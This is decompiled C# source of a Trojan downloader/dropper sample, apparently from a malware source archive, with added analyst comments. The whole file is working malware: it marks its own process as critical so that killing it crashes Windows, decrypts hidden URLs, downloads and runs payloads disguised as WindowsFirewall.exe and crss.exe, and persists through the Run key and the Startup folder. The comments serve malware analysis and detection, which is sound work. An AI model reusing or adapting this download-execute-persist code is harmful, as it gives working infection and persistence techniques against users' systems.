MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.bfcm-c01557638a82910361f2149b9432ad8f42d2d17a53d31917bcdb34e91acc08e6/vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.cs
2022-08-18 06:28:56 -05:00



// Decompiled with JetBrains decompiler
// Type: vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ
// Assembly: Downloader, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8B96CE03-B080-4512-8CC1-7DDE95F54AAA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.bfcm-c01557638a82910361f2149b9432ad8f42d2d17a53d31917bcdb34e91acc08e6.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
// ANALYST NOTES (decompiled sample, type and member names are obfuscated):
// Entry class of the "Downloader" assembly. Main() decrypts two embedded strings,
// passes each to WebClient.DownloadFile as the download address, starts the saved
// file, and writes an HKCU Run value pointing at it.
// Host indicators visible in this file:
//   - <System folder>\WindowsFirewall.exe
//   - <Startup folder>\crss.exe   (name resembles the legitimate csrss.exe)
//   - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value "Client Runtime Service"
// The download addresses are not visible in clear text; they are only present as the
// Base64/AES blobs passed to the string-decryption helper below.
internal static class vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ
{
// P/Invoke into ntdll. In this file it is only called with information class 29
// and a 4-byte int buffer (see Main).
[DllImport("ntdll")]
private static extern int NtSetInformationProcess(IntPtr p, int c, ref int i, int l);
/// <summary>
/// Program entry point: sets a process flag, runs two download-execute-persist
/// attempts, then clears the flag again.
/// </summary>
public static void Main()
{
// Information class 29 is ProcessBreakOnTermination in public ntdll references:
// a value of 1 marks the process as critical, so terminating it while the flag is
// set makes Windows bugcheck. The returned NTSTATUS is ignored, so the sample does
// not know whether the call succeeded (it normally requires SeDebugPrivilege - confirm
// in dynamic analysis).
int i1 = 1;
vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i1, 4);
// Stage 1: payload saved into the System folder under a name imitating a Windows component.
try
{
// Writing to the System folder presumably needs elevation; on failure the empty
// catch below hides the error and execution continues with stage 2.
string fileName = Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\WindowsFirewall.exe";
// The download address is the decrypted form of the embedded Base64 string.
new WebClient().DownloadFile(vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.ÍƾYjƔơƻƄT("K4grycAwDMKvf6NsgqFQJA5PuoMdteIUZs7xA+9DovkArANHKiv+rqzid4MVJn5b"), fileName);
// Child process creation of the freshly written file - a useful detection point
// (new executable written and immediately started by the same parent).
Process.Start(fileName);
// Persistence: per-user Run key opened writable; value "Client Runtime Service" = payload path.
// This line is only reached if the download and the process start did not throw.
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Client Runtime Service", (object) fileName);
}
catch
{
// All exceptions are swallowed: no logging, no retry.
}
// Stage 2: same sequence with a different encrypted address and the user's Startup folder.
try
{
// A file placed in the Startup folder is launched at logon on its own, so this stage
// has two autostart mechanisms (Startup folder plus the Run value below).
string fileName = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\crss.exe";
new WebClient().DownloadFile(vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.ÍƾYjƔơƻƄT("K4grycAwDMKvf6NsgqFQJA5PuoMdteIUZs7xA+9Dovl1hmWyr2yTB16aQjN0YI1t"), fileName);
Process.Start(fileName);
// Same value name as stage 1, so if both stages succeed this write replaces the
// stage-1 path and only crss.exe remains registered under the Run key.
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Client Runtime Service", (object) fileName);
}
catch
{
// All exceptions are swallowed here as well.
}
// Clears the flag set at the top of Main (value 0), again without checking the result.
// The flag is therefore only in effect while the two stages above are running.
int i2 = 0;
vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i2, 4);
}
/// <summary>
/// String-decryption helper: Base64-decodes the argument, decrypts it with Rijndael in
/// ECB mode under a key derived from a hard-coded constant, and returns the result as
/// ASCII text.
/// </summary>
/// <param name="ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ">Base64-encoded ciphertext.</param>
/// <returns>The decrypted bytes interpreted as an ASCII string.</returns>
/// <remarks>
/// Everything needed to recover the plaintext (constant, derivation, mode) is in this
/// method, so the embedded strings can be recovered statically in an isolated analysis
/// environment without running the sample. Block size and padding are not set here and
/// are left at the RijndaelManaged defaults.
/// </remarks>
private static string ÍƾYjƔơƻƄT(string ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ)
{
RijndaelManaged rijndaelManaged = new RijndaelManaged();
MD5CryptoServiceProvider cryptoServiceProvider = new MD5CryptoServiceProvider();
// 32-byte key buffer, zero-initialised.
byte[] destinationArray = new byte[32];
// 16-byte MD5 digest of the hard-coded ASCII constant.
byte[] hash = cryptoServiceProvider.ComputeHash(Encoding.ASCII.GetBytes("u y"));
// First copy fills key[0..15].
Array.Copy((Array) hash, 0, (Array) destinationArray, 0, 16);
// Second copy starts at index 15, not 16: it fills key[15..30], overwriting key[15]
// with hash[0] and leaving key[31] at 0. Any re-implementation for analysis must
// reproduce this overlap to get the same key.
Array.Copy((Array) hash, 0, (Array) destinationArray, 15, 16);
rijndaelManaged.Key = destinationArray;
// ECB: no IV is involved in decryption.
rijndaelManaged.Mode = CipherMode.ECB;
ICryptoTransform decryptor = rijndaelManaged.CreateDecryptor();
byte[] inputBuffer = Convert.FromBase64String(ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ);
return Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
}
}